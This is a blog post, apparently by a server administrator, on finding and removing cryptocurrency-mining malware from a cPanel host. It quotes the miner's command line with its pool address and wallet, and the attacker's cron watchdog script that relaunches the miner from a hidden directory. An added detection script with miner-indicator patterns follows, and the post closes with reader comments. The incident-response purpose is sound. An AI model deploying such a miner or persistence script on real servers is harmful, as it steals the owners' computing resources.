Cpanel server infected with mining software

12 March 2019 1,520 supporters 2 Comments

Recently, one of the servers under my control was infected with mining software. It caused unnecessary load and wasted server resources.

Since the server runs cPanel, I used WHM to track down the source. I checked WHM's 'Process Manager' and 'Daily Process Log' and found something similar to:

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

I used 'Process Manager' to kill the PID that was running the process.

I then checked the user's cPanel account and found a strange cron job pointing to an odd path, e.g.:

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the contents of the file using the cat command:

[[email protected] ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Change into that folder and see what is inside:

[[email protected] ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[[email protected] .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirms that the mining process was started from that path.

Delete the folder and remove the cron job so the mining stops.

[[email protected] .qts]# cd ..
[[email protected] includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
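As an added example (not part of the original post), the POSIX shell script below automates the two checks the post performs by hand: it flags running processes whose command line carries the miner indicators seen in the process log (a stratum+tcp:// pool URL or the cryptonight algorithm flag), and it flags cron entries that execute a file from a hidden dot-directory under a cPanel user's public_html, like the .qts/upd job above. The process listing and crontab used for the demo are constructed sample data, the wallet address is a placeholder, and the live scan assumes a RHEL/CentOS-style cPanel layout where per-user crontabs live in /var/spool/cron/<user>.

```shell
#!/bin/sh
# Added example, not from the original post. Automates the two manual checks
# described there: (1) find running processes carrying miner indicators and
# (2) find cron entries running from a hidden directory under public_html.
# Sample data below is constructed; the live scan only runs with --live.

# Print stdin lines whose command line contains a known miner indicator
# (the stratum+tcp:// pool URL or the cryptonight algorithm flag).
flag_miner_processes() {
    grep -E -i 'stratum[+]tcp://|cryptonight'
}

# Print stdin lines that reference a dot-directory anywhere below a
# cPanel user's public_html, e.g. /home/user/public_html/x/.qts/upd.
flag_hidden_cron_paths() {
    grep -E '/home/[^/ ]+/public_html(/[^/ ]+)*/\.[^/ ]+'
}

# Constructed sample process listing (user pid %cpu args): one miner line,
# two benign lines. The wallet address is a placeholder.
SAMPLE_PS='root 1 0.0 /sbin/init
impxxxx 4321 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u WALLET_PLACEHOLDER -p x
nobody 999 0.2 /usr/sbin/httpd -k start'

# Constructed sample crontab: one entry in a hidden public_html directory,
# two legitimate entries (one also under public_html, but not hidden).
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd >/dev/null 2>&1
30 1 * * * /usr/bin/php /home/impxxxx/public_html/cron/cleanup.php'

# Count how many sample lines each check flags.
count_flagged_processes() {
    printf '%s\n' "$SAMPLE_PS" | flag_miner_processes | wc -l | tr -d ' '
}
count_flagged_cron() {
    printf '%s\n' "$SAMPLE_CRON" | flag_hidden_cron_paths | wc -l | tr -d ' '
}

# Live scan of this host. Assumes a RHEL/CentOS-style cPanel layout where
# per-user crontabs live in /var/spool/cron/<user> (adjust for other distros).
scan_live() {
    echo "== processes with miner indicators =="
    ps -eo user,pid,pcpu,args | flag_miner_processes
    echo "== user crontabs running from hidden public_html directories =="
    for f in /var/spool/cron/*; do
        [ -f "$f" ] || continue
        flag_hidden_cron_paths < "$f" | sed "s|^|$(basename "$f"): |"
    done
}

if [ "$1" = "--live" ]; then
    scan_live
else
    echo "flagged sample processes: $(count_flagged_processes)"
    printf '%s\n' "$SAMPLE_PS" | flag_miner_processes
    echo "flagged sample cron entries: $(count_flagged_cron)"
    printf '%s\n' "$SAMPLE_CRON" | flag_hidden_cron_paths
fi
```

Run it with no arguments to see the checks applied to the sample data (one process line and one cron line are flagged); run it as root with --live to apply the same two filters to the real process table and crontab spool. A hit on either check is a prompt to look at the user's account the way the post does, not a verdict by itself: a legitimate job under public_html would not be flagged, but a legitimate job in a dot-directory would be.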

2 Comments

  • admin (author) said:

    Outdated script…

  • kumail said:

    Do you have any idea of how they infected the server in the first place? How did they upload the bash.pid file onto the server?
